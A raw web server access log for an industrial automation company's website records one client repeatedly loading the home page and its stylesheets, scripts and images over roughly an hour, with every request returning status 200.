www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:41:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:41:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:41:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:41:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:41:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:52:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10410] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:01:52:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:52:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:52:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:52:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:52:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:52:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:52:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20912] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:52:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4789] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:52:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:52:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:52:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:52:23 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:52:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:54:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10393] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:01:54:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:54:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:54:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:54:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:54:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:54:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:54:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20912] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:54:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 4789] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:54:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:54:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:54:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:54:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:54:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:58:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10393] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:01:58:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:58:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:58:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:58:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:58:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:58:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:58:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20912] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:58:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 3302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:58:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:58:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:58:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:58:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:01:58:26 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:09:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10393] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:09:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:09:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:09:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:09:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:09:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:09:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:09:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20830] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:09:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 3987] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:09:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:09:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:09:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:09:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:09:28 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:26:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10366] [Gzip 5.49] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:26:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:26:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 1411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:26:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:26:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:26:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:26:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:26:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20952] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:26:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 2848] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:26:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:26:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:26:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:26:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:26:29 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:02:31:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10399] [Gzip 5.47] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:02:31:20 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] 